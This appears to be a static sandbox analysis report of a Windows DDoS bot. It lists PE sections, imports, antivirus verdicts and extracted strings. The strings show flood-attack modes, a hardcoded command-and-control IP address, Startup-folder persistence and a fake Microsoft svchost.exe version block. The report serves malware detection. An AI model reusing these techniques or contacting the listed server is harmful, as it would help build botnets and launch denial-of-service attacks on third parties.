Static | ZeroBOX

PE Compile Time

2025-04-08 22:33:10

PE Imphash

56546ba9d904ef5928b0a1c996b679d1

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00009f60 0x0000a000 6.23178904622
.data 0x0000b000 0x00000110 0x00000200 1.18915082195
.rdata 0x0000c000 0x00001950 0x00001a00 5.28289430942
.pdata 0x0000e000 0x0000069c 0x00000800 3.80516220913
.xdata 0x0000f000 0x00000728 0x00000800 4.27815336303
.bss 0x00010000 0x00000c60 0x00000000 0.0
.idata 0x00011000 0x00000f0c 0x00001000 4.22287882769
.CRT 0x00012000 0x00000068 0x00000200 0.332552443246
.tls 0x00013000 0x00000010 0x00000200 0.0
.rsrc 0x00014000 0x000003b0 0x00000400 3.08755623102
.reloc 0x00015000 0x00000098 0x00000200 1.72067817112

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x00014058 0x00000358 LANG_ENGLISH SUBLANG_ENGLISH_US data

Imports

Library ADVAPI32.dll:
0x1400113fc CryptAcquireContextA
0x140011404 CryptGenRandom
0x14001140c CryptReleaseContext
Library IPHLPAPI.DLL:
0x14001141c GetTcpTable
Library KERNEL32.dll:
0x14001142c CloseHandle
0x140011434 CopyFileA
0x14001143c CreateMutexA
0x140011444 CreateThread
0x14001144c DeleteCriticalSection
0x140011454 DeleteFileA
0x14001145c EnterCriticalSection
0x140011464 ExitProcess
0x14001146c GetCurrentProcessId
0x140011474 GetLastError
0x14001147c GetModuleFileNameA
0x140011484 GetModuleHandleW
0x14001148c GetProcAddress
0x140011494 GetStartupInfoA
0x1400114a4 IsDBCSLeadByteEx
0x1400114ac LeaveCriticalSection
0x1400114b4 MoveFileA
0x1400114bc MultiByteToWideChar
0x1400114c4 ReleaseMutex
0x1400114cc SetThreadPriority
0x1400114dc Sleep
0x1400114e4 TlsGetValue
0x1400114ec VirtualProtect
0x1400114f4 VirtualQuery
0x1400114fc WaitForMultipleObjects
0x140011504 WideCharToMultiByte
Library msvcrt.dll:
0x140011514 __C_specific_handler
0x14001151c ___lc_codepage_func
0x140011524 ___mb_cur_max_func
0x14001152c __getmainargs
0x140011534 __initenv
0x14001153c __iob_func
0x140011544 __lconv_init
0x14001154c __set_app_type
0x140011554 __setusermatherr
0x14001155c _acmdln
0x140011564 _amsg_exit
0x14001156c _cexit
0x140011574 _commode
0x14001157c _errno
0x140011584 _exit
0x14001158c _fmode
0x140011594 _initterm
0x14001159c _lock
0x1400115a4 _onexit
0x1400115ac _time64
0x1400115b4 _unlock
0x1400115bc abort
0x1400115c4 atoi
0x1400115cc calloc
0x1400115d4 exit
0x1400115dc fclose
0x1400115e4 fopen
0x1400115ec fprintf
0x1400115f4 fputc
0x1400115fc free
0x140011604 fwrite
0x14001160c localeconv
0x140011614 malloc
0x14001161c memcpy
0x140011624 perror
0x14001162c rand
0x140011634 signal
0x14001163c strcpy
0x140011644 strerror
0x14001164c strlen
0x140011654 strncmp
0x14001165c strrchr
0x140011664 strstr
0x14001166c vfprintf
0x140011674 wcslen
0x14001167c _write
0x140011684 _open
0x14001168c _close
Library SHELL32.dll:
0x14001169c SHGetSpecialFolderPathA
Library WS2_32.dll:
0x1400116ac WSACleanup
0x1400116b4 WSAGetLastError
0x1400116bc WSASetLastError
0x1400116c4 WSASocketA
0x1400116cc WSAStartup
0x1400116d4 __WSAFDIsSet
0x1400116dc bind
0x1400116e4 closesocket
0x1400116ec connect
0x1400116f4 getsockopt
0x1400116fc htonl
0x140011704 htons
0x14001170c inet_addr
0x140011714 ioctlsocket
0x14001171c ntohl
0x140011724 ntohs
0x14001172c recv
0x140011734 select
0x14001173c send
0x140011744 sendto
0x14001174c setsockopt
0x140011754 shutdown
0x14001175c socket

Starting optimized TCP attack on %s:%d with %d threads for %d seconds
Memory allocation failed
Failed to allocate memory for thread %d
Failed to create thread %d
TCP attack on %s:%d completed
Failed to create thread %d
Port %d is already in use by another process (bind check)
Port %d is already in use by another process (TCP table check)
Received signal %d, preparing for shutdown...
WSAStartup failed with error: %d
Could not find a usable version of Winsock.dll
Winsock initialized successfully
Closing client socket
Winsock cleaned up
Cleaning up resources...
Releasing mutex
Bot shutdown complete, all resources released.
%d.%d.%d.%d
Port %d is already in use. Not launching TCP attack.
Port %d is already in use. Not launching UDP attack.
Port %d is already in use. Not launching PPS attack.
Port %d is already in use. Not launching NUDP attack.
Port %d is already in use. Not launching UDP Payload attack.
Port %d is already in use. Not launching TCP Payload attack.
synack
acksyn
synrst
ackpsh
finack
Invalid socket passed to connect_with_timeout
Failed to set socket to non-blocking mode: %d
Connect failed immediately with error: %d
Connection attempt timed out
Select failed during connect: %d
Connection failed with error: %d
Socket is not writable after select
Failed to set socket back to blocking mode: %d
RtlGetVersion
Windows %lu.%lu (Bot build %.1f)
Unknown (Bot build %.1f)
CBOTX_INSTANCE_MUTEX_1_7
Another bot instance is already running. Exiting...
Another bot is already using port %d. Shutting down...
123.253.61.24
Failed to create socket. Waiting before retry...
Attempting to connect to CNC server at %s:%d
Connection failed. Retrying in 3 seconds...
Connected to C&C server
recv failed
Server closed connection
Received %d bytes:
Heartbeat failed, server unavailable
Select error: %d
Disconnected from server. Retrying in 3 seconds...
Main loop exited, performing cleanup...
File deleted successfully: %s
Error deleting file: %s. Error code: %d
svchost.exe
File %s deleted from Startup.
Error: Failed to delete file %s from Startup. Error code: %d
Error: Could not get Startup folder path.
Old file with the same name deleted successfully.
Error while deleting old file: %d
File renamed successfully to: %s
Error while renaming file: %d
File does not exist in Startup to rename.
File copied to Startup successfully.
Error while copying file: %d
File already exists in Startup.
CONOUT$
*** stack smashing detected ***:
*** buffer overflow detected ***:
terminated
Unknown error
Argument domain error (DOMAIN)
Overflow range error (OVERFLOW)
Partial loss of significance (PLOSS)
Total loss of significance (TLOSS)
The result is too small to be represented (UNDERFLOW)
Argument singularity (SIGN)
_matherr(): %s in %s(%g, %g) (retval=%g)
Mingw-w64 runtime failure:
Address %p has no image-section
VirtualQuery failed for %d bytes at address %p
VirtualProtect failed with code 0x%x
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
(null)
Infinity
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 10-win32 20220113
InitializeCriticalSection
SetUnhandledExceptionFilter
ntdll.dll
(null)
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Host Process for Windows Services
FileVersion
1.2.0.0
InternalName
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
svchost.exe
ProductName
Microsoft
Windows
Operating System
ProductVersion
1.2.0.0
VarFileInfo
Translation

Antivirus Signature
Bkav Clean
Lionic Trojan.Win32.Generic.4!c
Elastic malicious (high confidence)
ClamAV Clean
CMC Clean
CAT-QuickHeal Trojan.Ghanarava.1744459309f35a66
Skyhigh Artemis!Trojan
ALYac Gen:Variant.Barys.431553
Cylance Unsafe
Zillya Clean
Sangfor Trojan.Win64.Agent.Vlxw
CrowdStrike win/malicious_confidence_90% (D)
Alibaba Clean
K7GW Trojan ( 005c58731 )
K7AntiVirus Trojan ( 005c58731 )
huorong Clean
Baidu Clean
VirIT Clean
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 a variant of Win64/Agent_AGen.DKM
APEX Clean
Avast Win64:MalwareX-gen [Misc]
Cynet Malicious (score: 99)
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Gen:Variant.Barys.431553
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Gen:Variant.Barys.431553
Tencent Win64.Trojan.Generic.Gwnw
Sophos Generic Reputation PUA (PUA)
F-Secure Trojan.TR/AVI.Agent.xvgra
DrWeb Clean
VIPRE Gen:Variant.Barys.431553
TrendMicro Clean
McAfeeD ti!EFE81402806E
Trapmine Clean
CTX exe.trojan.barys
Emsisoft Gen:Variant.Barys.431553 (B)
Ikarus Trojan.Win64.Agent
GData Gen:Variant.Barys.431553
Jiangmin Clean
Webroot Clean
Varist W64/ABTrojan.FIGG-6150
Avira TR/AVI.Agent.xvgra
Antiy-AVL Trojan[Ransom]/MSIL.HiddenTear
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Barys.D695C1
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Ransom:MSIL/HiddenTear!rfn
Google Detected
AhnLab-V3 Trojan/Win.Generic.R700125
Acronis Clean
McAfee Artemis!E985D78DA4B4
TACHYON Clean
VBA32 Clean
Malwarebytes Trojan.Dropper
Panda Trj/Agent.RP
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R002H09DB25
Rising Trojan.Generic!8.C3 (CLOUD)
Yandex Clean
SentinelOne Clean
MaxSecure Clean
Fortinet W32/PossibleThreat
AVG Win64:MalwareX-gen [Misc]
DeepInstinct MALICIOUS
alibabacloud Trojan:Win/Barys.Gen
No IRMA results available.